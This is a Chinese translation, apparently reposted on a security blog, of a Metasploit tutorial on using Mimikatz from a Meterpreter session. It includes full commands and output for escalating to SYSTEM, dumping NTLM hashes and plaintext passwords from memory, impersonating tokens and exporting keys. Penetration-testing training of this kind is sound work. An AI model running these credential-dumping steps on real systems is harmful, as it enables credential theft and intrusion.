Mimikatz ON Metasploit

  • A+
所属分类:安全文章
摘要

from:http://www.offensive-security.com/metasploit-unleashed/Mimikatz看了各种文章讲神器mimikatz,但是一直没有讲与metasploit使用的。Metasploit其实早就集成了mimikatz,现在将官方的文章翻译给大家。

from:http://www.offensive-security.com/metasploit-unleashed/Mimikatz

0x00 背景


看了各种文章讲神器mimikatz,但是一直没有讲与metasploit使用的。Metasploit其实早就集成了mimikatz,现在将官方的文章翻译给大家。

Mimikatz是Benjamin Delpy (gentilkiwi)写的非常棒的一款后渗透测试工具。在最初渗透阶段之后的大多数时间里,攻击者们可能是想在计算机/网络中得到一个更坚固的立足点。这样做通常需要一组补充的工具。Mimikatz是一种将攻击者想执行的、最有用的任务捆绑在一起的尝试。

幸运地,metasploit已经决定将其作为一个meterpreter脚本来集成mimikatz,允许方便地访问它一系列的特性,而不需要上传任何文件到被盗用主机的磁盘上。

Note:在metasploit中mimikatz的版本是v1.0,然而Benjamin Delpy早已经在他的网站上作为一个独立的包发布了v2.0。这是有必要提出的,因为很多的语法与升级到v2.0已经改变了。

0x01 Loading Mimikatz


在得到一个meterpreter shell后,我们应该确保我们的session是运行在system权限以便让mimikatz正常工作。

meterpreter > getuid  Server username: WINXP-E95CE571A1/Administrator  meterpreter > getsystem  ...got system (via technique 1).  meterpreter > getuid  Server username: NT AUTHORITY/SYSTEM 

Mimikatz支持32位和64位的windows架构。在升级权限到system后,我们需要通过“sysinfo”命令来确认目标机器的架构。这对于64位机器是有必要的,因为我们可能会破坏一个32位的进程在64位的架构上。如果这样的话,meterpreter将会尝试加载32位版本的mimikatz到内存,将可能会使得大部分的特性不可用。这可以通过查看正在运行的进程列表以及在加载mimikatz之前迁移到64位进程来避免。

meterpreter > sysinfo  Computer : WINXP-E95CE571A1  OS : Windows XP (Build 2600, Service Pack 3).  Architecture : x86  System Language : en_US  Meterpreter : x86/win32 

既然这是一个32位机器,我们可以加载mimikatz模块进内存:

meterpreter > load mimikatz  Loading extension mimikatz...success.  meterpreter > help mimikatz  # Mimikatz Commands      Command           Description     -------           -----------     kerberos          Attempt to retrieve kerberos creds     livessp           Attempt to retrieve livessp creds     mimikatz_command  Run a custom commannd     msv               Attempt to retrieve msv creds (hashes)     ssp               Attempt to retrieve ssp creds     tspkg             Attempt to retrieve tspkg creds     wdigest           Attempt to retrieve wdigest creds 

Metasploit提供给我们一些内建的命令来查看mimikatz的最常用的功能:从内存中导出hash以及明文证书。Mimikatz_command选项可以让我们使用mimikatz的全部特性。

meterpreter > mimikatz_command -f version  mimikatz 1.0 x86 (RC) (Nov 7 2013 08:21:02) 

尽管有些不同寻常,我们仍然可以通过尝试加载一个不存在的特性来得到可用模块的完整列表:

meterpreter > mimikatz_command -f fu:: Module : 'fu' introuvable  Modules disponibles :                  - Standard       crypto    - Cryptographie et certificats         hash    - Hash       system    - Gestion système      process    - Manipulation des processus       thread    - Manipulation des threads      service    - Manipulation des services    privilege    - Manipulation des privilèges       handle    - Manipulation des handles  impersonate    - Manipulation tokens d'accès      winmine    - Manipulation du démineur  minesweeper    - Manipulation du démineur 7        nogpo    - Anti-gpo et patchs divers      samdump    - Dump de SAM       inject    - Injecteur de librairies           ts    - Terminal Server       divers    - Fonctions diverses n'ayant pas encore assez de corps pour avoir leurs propres module     sekurlsa    - Dump des sessions courantes par providers LSASS          efs    - Manipulations EFS 

我们可以使用如下的语法来请求某个模块可用的选项:

meterpreter > mimikatz_command -f divers:: Module : 'divers' identifié, mais commande '' introuvable  Description du module : Fonctions diverses n'ayant pas encore assez de corps pour avoir leurs propres module   noroutemon    - [experimental] Patch Juniper Network Connect pour ne plus superviser la table de routage    eventdrop    - [super experimental] Patch l'observateur dvénements pour ne plus rien enregistrer   cancelator    - Patch le bouton annuler de Windows XP et 2003 en console pour déverrouiller une session      secrets    - Affiche les secrets utilisateur 

0x02 从内存中读取hash和密码


我们既可以使用metasploit内建的命令也可以使用mimikatz自带的命令来从目标机器上导出hash和明文证书。

Built-In Metasploit:msv credentials

meterpreter > msv [+] Running as SYSTEM [*] Retrieving msv credentials msv credentials ===============  AuthID   Package    Domain           User              Password ------   -------    ------           ----              -------- 0;78980  NTLM       WINXP-E95CE571A1  Administrator     lm{ 00000000000000000000000000000000 }, ntlm{ d6eec67681a3be111b5605849505628f } 0;996    Negotiate  NT AUTHORITY     NETWORK SERVICE   lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 } 0;997    Negotiate  NT AUTHORITY     LOCAL SERVICE     n.s. (Credentials KO) 0;56683  NTLM                                          n.s. (Credentials KO) 0;999    NTLM       WORKGROUP        WINXP-E95CE571A1$  n.s. (Credentials KO) 

kerberos credentials

meterpreter > kerberos [+] Running as SYSTEM [*] Retrieving kerberos credentials kerberos credentials ====================  AuthID   Package    Domain           User              Password ------   -------    ------           ----              -------- 0;999    NTLM       WORKGROUP        WINXP-E95CE571A1$   0;997    Negotiate  NT AUTHORITY     LOCAL SERVICE      0;56683  NTLM                                           0;996    Negotiate  NT AUTHORITY     NETWORK SERVICE    0;78980  NTLM       WINXP-E95CE571A1  Administrator     SuperSecretPassword 

Native Mimikatz:

meterpreter > mimikatz_command -f samdump::hashes Ordinateur : winxp-e95ce571a1 BootKey    : 553d8c1349162121e2a5d3d0f571db7f  Rid  : 500 User : Administrator LM   :  NTLM : d6eec67681a3be111b5605849505628f  Rid  : 501 User : Guest LM   :  NTLM :   Rid  : 1000 User : HelpAssistant LM   : 6165cd1a0ebc61e470475c82cd451e14 NTLM :   Rid  : 1002 User : SUPPORT_388945a0 LM   :  NTLM : 771ee1fce7225b28f8aec4a88aea9b6a  meterpreter > mimikatz_command -f sekurlsa::searchPasswords [0] { Administrator ; WINXP-E95CE571A1 ; SuperSecretPassword } 

<前面一句命令在密码超过14位时LM会为空,后一句命令可以得到明文>

0x03 其他的模块


Mimikatz的一些其他模块包含了很多有用的特性,更完整的特性列表可以在Benjamin Delpy的博客 http://blog.gentilkiwi.com/上找到。下面是几个使用实例:

Handle模块可以用来list/kill进程以及模拟用户令牌:

meterpreter > mimikatz_command -f handle:: Module : 'handle' identifié, mais commande '' introuvable  Description du module : Manipulation des handles         list    - Affiche les handles du système (pour le moment juste les processus et tokens)  processStop    - Essaye de stopper un ou plusieurs processus en utilisant d'autres handles tokenImpersonate        - Essaye d'impersonaliser un token en utilisant d'autres handles      nullAcl    - Positionne une ACL null sur des Handles  meterpreter > mimikatz_command -f handle::list ...snip...   760  lsass.exe                 ->  1004       Token           NT AUTHORITY/NETWORK SERVICE   760  lsass.exe                 ->  1008       Process 704     winlogon.exe   760  lsass.exe                 ->  1052       Process 980     svchost.exe   760  lsass.exe                 ->  1072       Process 2664    fubar.exe   760  lsass.exe                 ->  1084       Token           NT AUTHORITY/LOCAL SERVICE   760  lsass.exe                 ->  1096       Process 704     winlogon.exe   760  lsass.exe                 ->  1264       Process 1124    svchost.exe   760  lsass.exe                 ->  1272       Token           NT AUTHORITY/ANONYMOUS LOGON   760  lsass.exe                 ->  1276       Process 1804    psia.exe   760  lsass.exe                 ->  1352       Process 480     jusched.exe   760  lsass.exe                 ->  1360       Process 2056    TPAutoConnSvc.exe   760  lsass.exe                 ->  1424       Token           WINXP-E95CE571A1/Administrator ...snip... 

Service模块让你可以list/start/stop以及remove windows服务:

meterpreter > mimikatz_command -f service:: Module : 'service' identifié, mais commande '' introuvable  Description du module : Manipulation des services         list    - Liste les services et pilotes        start    - Démarre un service ou pilote         stop    - Arrête un service ou pilote       remove    - Supprime un service ou pilote     mimikatz    - Installe et/ou démarre le pilote mimikatz  meterpreter > mimikatz_command -f service::list ...snip...         WIN32_SHARE_PROCESS     STOPPED RemoteRegistry  Remote Registry         KERNEL_DRIVER   RUNNING RFCOMM  Bluetooth Device (RFCOMM Protocol TDI)         WIN32_OWN_PROCESS       STOPPED RpcLocator      Remote Procedure Call (RPC) Locator   980   WIN32_OWN_PROCESS       RUNNING RpcSs   Remote Procedure Call (RPC)         WIN32_OWN_PROCESS       STOPPED RSVP    QoS RSVP   760   WIN32_SHARE_PROCESS     RUNNING SamSs   Security Accounts Manager         WIN32_SHARE_PROCESS     STOPPED SCardSvr        Smart Card  1124   WIN32_SHARE_PROCESS     RUNNING Schedule        Task Scheduler         KERNEL_DRIVER   STOPPED Secdrv  Secdrv  1124   INTERACTIVE_PROCESS     WIN32_SHARE_PROCESS     RUNNING seclogon        Secondary Logon  1804   WIN32_OWN_PROCESS       RUNNING Secunia PSI Agent       Secunia PSI Agent  3460   WIN32_OWN_PROCESS       RUNNING Secunia Update Agent    Secunia Update Agent ...snip... 

Crypto模块允许你list、export任何证书,以及储存在目标机器上相应的私钥:

meterpreter > mimikatz_command -f crypto:: Module : 'crypto' identifié, mais commande '' introuvable  Description du module : Cryptographie et certificats listProviders   - Liste les providers installés)   listStores    - Liste les magasins système listCertificates        - Liste les certificats     listKeys    - Liste les conteneurs de clés exportCertificates      - Exporte les certificats   exportKeys    - Exporte les clés     patchcng    - [experimental] Patch le gestionnaire de clés pour l'export de clés non exportable    patchcapi    - [experimental] Patch la CryptoAPI courante pour l'export de clés non exportable  meterpreter > mimikatz_command -f crypto::listProviders Providers CryptoAPI :         Gemplus GemSAFE Card CSP v1.0         Infineon SICRYPT Base Smart Card CSP         Microsoft Base Cryptographic Provider v1.0         Microsoft Base DSS and Diffie-Hellman Cryptographic Provider         Microsoft Base DSS Cryptographic Provider         Microsoft Base Smart Card Crypto Provider         Microsoft DH SChannel Cryptographic Provider         Microsoft Enhanced Cryptographic Provider v1.0         Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider         Microsoft Enhanced RSA and AES Cryptographic Provider (Prototype)         Microsoft RSA SChannel Cryptographic Provider 

0x04 Never Lose At Minesweeper Again!


Mimikatz也包含许多新奇的特性。最重要的一个就是能够在经典的windows扫描游戏中,直接从内存中读地雷的位置。

Mimikatz ON Metasploit

meterpreter > mimikatz_command -f winmine::infos Mines           : 99 Dimension       : 16 lignes x 30 colonnes Champ           :            . . . . . . * . * 1   1 * 1           1 * . . . . . . * . *          . . * . . . . . . 1   1 1 1       1 1 2 . * . * * . * * . .          . * . . . . . * . 1         1 1 1 1 * . . . * . . * . . . .          . . . . . * . * * 2 1     1 2 * . . . * * . . * . . . . * .          . . * . . * . . . * 1     1 * . * . . . . . . . * . * . . .          . * * . . . . . . . 2 1 1 1 . * . . . . * . . * . . . . . .          . . . . . . . . . . . * . . . . . * . . . . . * * . . . . .          . . . * . * . . . . . * . * . . . . * . . . . * . . . . . .          . . . . . * * . * . * . * . * * . * * * . . . . . . . . * .          * * . * . . . 3 1 2 1 2 1 . . * . . * . . * . . * . . . . .          . . . . * * * 1         1 . . * * . . . * . . . . . . * . *          . . * * * . 3 1     1 1 2 * 2 2 2 . * . . . . . . * . . . .          . . . . . * 1   1 1 2 * . 1 1   1 . . . . * . * * * . . . .          . . . . . . 1   1 * . . . 1     1 * . . . * . . . . . * . .          . . . . . . 1 1 2 . . . * 1     1 1 1 1 * * . * . . . . * .          . * . . . . . * . . . * . 1           1 . * . . . . . . . * 

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: